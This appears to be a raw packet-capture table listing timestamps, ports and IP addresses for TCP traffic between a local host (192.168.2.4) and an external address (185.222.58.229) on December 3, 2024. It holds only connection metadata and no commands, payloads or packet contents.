Dec 3, 2024 13:27:17.070560932 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070585966 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070599079 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070614100 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070658922 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070705891 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070714951 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070730925 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070739031 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070756912 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070770979 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070780993 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070785046 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070828915 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070853949 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070863008 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070903063 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070909977 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070924044 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070943117 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.070956945 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070972919 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070992947 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.070998907 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.071010113 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.071058035 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.071130991 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.071141005 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.071150064 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.071182013 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.071218967 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.185591936 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.185604095 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.185678959 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.185735941 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.185827971 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.185847998 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.185925007 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.185962915 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.185992002 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186027050 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186038017 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186077118 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186168909 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186180115 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186235905 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186286926 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186296940 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186353922 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186362982 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186388016 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186414957 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186434031 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186542988 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186625957 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186670065 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186686993 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186721087 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186721087 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186769962 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186772108 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186817884 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186825037 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186904907 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186933041 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186954975 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.186989069 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.186990023 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.187010050 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187043905 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.187058926 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.187135935 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187144995 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187191963 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.187267065 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187278032 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187338114 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.187367916 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187406063 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187463999 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.187500000 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187521935 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187576056 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.187607050 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187665939 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187721014 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.187757015 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187766075 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187813044 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.187933922 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.187983036 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188035965 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.188103914 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188121080 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188177109 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.188246965 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188297987 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188339949 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.188410044 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188499928 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188544989 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188554049 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.188555002 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188602924 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.188643932 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188668966 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188730001 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.188826084 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188841105 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188949108 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.188971996 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.188988924 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189038992 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.189138889 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189178944 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189246893 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.189296961 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189343929 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189403057 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.189460993 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189507008 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189560890 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.189647913 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189666986 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189729929 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.189831018 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189840078 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189908028 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.189933062 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.189965010 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190018892 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.190048933 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190107107 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190145016 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190162897 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.190211058 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.190237045 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190287113 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.190305948 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190325975 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190401077 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.190423965 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190460920 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190515995 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.190521002 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190532923 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190582991 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.190602064 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190655947 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190704107 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190713882 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.190746069 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190798044 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.190920115 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190963984 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.190985918 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.191004038 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.191068888 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191127062 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191188097 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.191210985 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191237926 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191287041 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.191346884 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191355944 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191402912 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.191432953 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191457033 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191490889 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.191509008 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.191519022 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191544056 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191595078 CET	49739	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:17.191618919 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191660881 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191740036 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191746950 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191922903 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191931963 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191940069 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191946983 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191953897 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.191962004 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192051888 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192060947 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192120075 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192133904 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192234993 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192253113 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192404032 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192413092 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192441940 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192491055 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192537069 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192593098 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192698956 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192707062 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192749977 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192759037 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192846060 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192853928 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192938089 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.192949057 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193002939 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193011045 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193065882 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193073034 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193115950 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193156004 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193250895 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193258047 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193305016 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193320036 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193439007 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193533897 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193552017 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193633080 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193641901 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193696022 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193823099 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193830967 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193845034 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193852901 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193895102 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.193939924 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194025040 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194032907 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194128990 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194137096 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194221020 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194227934 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194269896 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194319010 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194374084 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194385052 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194438934 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194454908 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194514990 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194523096 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194641113 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194648981 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194655895 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194659948 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194765091 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194791079 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.194974899 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195007086 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195116043 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195203066 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195211887 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195254087 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195391893 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195409060 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195549011 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195619106 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195668936 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195677042 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195772886 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195780039 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195815086 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195861101 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195957899 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.195966005 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196083069 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196099043 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196223974 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196327925 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196448088 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196455956 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196531057 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196538925 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196587086 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196603060 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196685076 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196691990 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196789026 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196796894 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196845055 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196893930 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196947098 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.196955919 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197086096 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197093964 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197144032 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197235107 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197242975 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197367907 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197376013 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197384119 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197491884 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197499990 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197506905 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197516918 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197642088 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197650909 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197704077 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197760105 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197830915 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197873116 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197935104 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.197968960 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198038101 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198084116 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198169947 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198179007 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198234081 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198278904 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198401928 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198482990 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198533058 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198542118 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198596954 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198628902 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198766947 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198810101 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198859930 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198893070 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198956966 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.198965073 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199054003 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199062109 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199116945 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199125051 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199202061 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199254036 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199367046 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199430943 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199557066 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199564934 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199738026 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199744940 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199753046 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199760914 CET	55615	49739	185.222.58.229	192.168.2.4
